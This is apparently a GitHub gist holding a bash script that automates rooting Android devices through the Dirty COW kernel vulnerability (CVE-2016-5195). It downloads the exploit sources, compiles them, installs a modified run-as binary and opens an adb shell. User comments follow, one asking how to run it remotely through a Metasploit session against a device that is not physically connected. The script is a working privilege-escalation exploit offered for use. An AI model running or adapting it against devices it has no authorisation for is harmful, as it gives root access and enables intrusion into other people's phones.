-
-
Save Arinerron/0e99d69d70a778ca13a0087fa6fdfd80 to your computer and use it in GitHub Desktop.
| #!/bin/bash | |
| # Give the usual warning. | |
| clear; | |
| echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds..."; | |
| sleep 10; | |
| clear; | |
| # Download and extract exploit files. | |
| echo "[INFO] Downloading exploit files from GitHub..."; | |
| workspacezip="dirtyc0w_workspace.zip"; | |
| workspace="dirtyc0w_workspace"; | |
| rm -f $workspacezip > /dev/null; # Remove zip if it exists | |
| rm -rf $workspace > /dev/null; # Remove workspace if it exists | |
| wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip > /dev/null 2>&1; | |
| if [ -f $workspacezip ]; | |
| then | |
| echo "[INFO] Extracting exploit files..."; | |
| unzip -a $workspacezip -d $workspace > /dev/null; | |
| rm -f $workspacezip; # Remove zip if it exists | |
| else | |
| echo "[ERR] Failed to download exploit files."; | |
| exit 1; | |
| fi; | |
| if [ -d $workspace ]; | |
| then | |
| cd $workspace; | |
| directory=$PWD; # thx @tomdeboer! | |
| cd CVE-2016-5195-master; | |
| else | |
| echo "[ERR] Failed to extract exploit files."; | |
| exit 1; | |
| fi; | |
| # Compile and send exploit. | |
| echo "[INFO] Exploiting dirtyc0w vulnerability..."; | |
| sleep 1; # Let them read the message before chaos | |
| make root; | |
| clear; | |
| # Hooray! | |
| echo -n "[INFO] Complete. Installed package \"run-as\" on device.\n[INFO] Cleaning up workspace..."; | |
| rm -rf $directory; # Clean up workspace | |
| echo "Done"; | |
| echo "[INFO] Starting shell in 3 seconds..."; | |
| sleep 3; # Look, it worked! | |
| adb shell; | |
| clear; | |
| exit 0; |
So this Script installs a Custom Version of run-as? Do i lose my guarantee if i use this Script?
@Arinerron Hello! I am very new to Github, It is my first comment. Just signed up and wanna ask you something, I came to know about this vulnerability but I was working on Metasploit and somehow find that video where it shows gaining root privilege remotely through metasploit just have to open USB DEBUGGING and run this root.sh on android mobile /sdcard dir.
So my question is as I am facing the same error that the files fails to download from github when I run the script on metasploit session, But when I run it on the directory where SDK is installed it works but says no emulated or android devices connected obviously.
I just downloaded SDK manually and extracted in Home directory but when ever I try to run the script it on metasploit session it fails to download from Github.
Can you please simplify my issue for me? just straight forwardly wanna know is it possible to gain acces remotely without devices being connected through USB and have this root.sh running and getting root privilege ? If yes than how can I use those manual step you provided as I can't connect the device I wanna try it on Metasploit...
@Arinerron Can you use this on a TV arch?
Running ARM-v7-A. Hisilicon chip.
Android 7.0 Nougat
Is there something we have to write in place of "by-name"